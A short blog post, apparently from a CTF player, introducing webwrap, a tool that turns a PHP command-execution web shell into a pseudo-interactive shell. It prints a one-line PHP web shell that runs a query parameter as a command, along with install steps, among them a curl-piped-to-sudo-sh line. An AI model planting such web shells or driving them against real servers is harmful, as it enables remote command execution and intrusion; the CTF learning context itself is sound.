webwrap - An amazing pseudo web shell tool
Introduction
A few days ago, while doing a CTF I’ve encountered a problem. I was able to upload a PHP file to the target server, but I couldn’t spawn a web shell due to firewall restrictions. The only way I could interact with the server was by executing commands using the uploaded PHP files and printing output on the page.
The simplified PHP file (the original one utilized a disabled_functions bypass, because exec() was disabled in the config):
<?php
echo exec($_GET(['cmd']));
>
Until that CTF I was using a python script to automate it. In a while loop: get user input, create a request and print the response to the terminal. It works, but it’s very inefficient mainly because it doesn’t keep the current path. Fortunately, I found a tool that does exactly what I need!
webwrap
webwrap is a tool that automates the process described above and creates a pseudo shell that simulates a real one. Github: https://github.com/mxrch/webwrap
Installation
Linux (Quick)
curl -s https://raw.githubusercontent.com/mxrch/webwrap/master/install.sh | sudo sh
Linux (normal)
sudo apt install rlwrap
git clone https://github.com/mxrch/webwrap;
cd webwrap;
sudo python3 -m pip install -r requirements.txt
Windows
git clone https://github.com/mxrch/webwrap;
cd webwrap;
python -m pip install -r requirements.txt
Usage
webwrap http://<LINK>/my_verycool_webshell.php?cmd=WRAP
Where:
my_verycool_webshell.phpis your shell filecmdis the argument that shell uses$_GET(['<here>'])
Limitations
While using this tool you need to remember that it is not a real shell. Commands such as su or shh will not work as they require a full interactive terminal, but some of them can be bypassed with e.g. python’s pty. Additionally, commands that take more than ~2 seconds to execute will time out the request and break the script.
Conclusions
webwrap is an amazing tool to use when you cannot have a regular reverse shell. It automates a process of requesting command executions and makes you gain speed. Although it has its limitations I’ll definitely use it in future CTFs.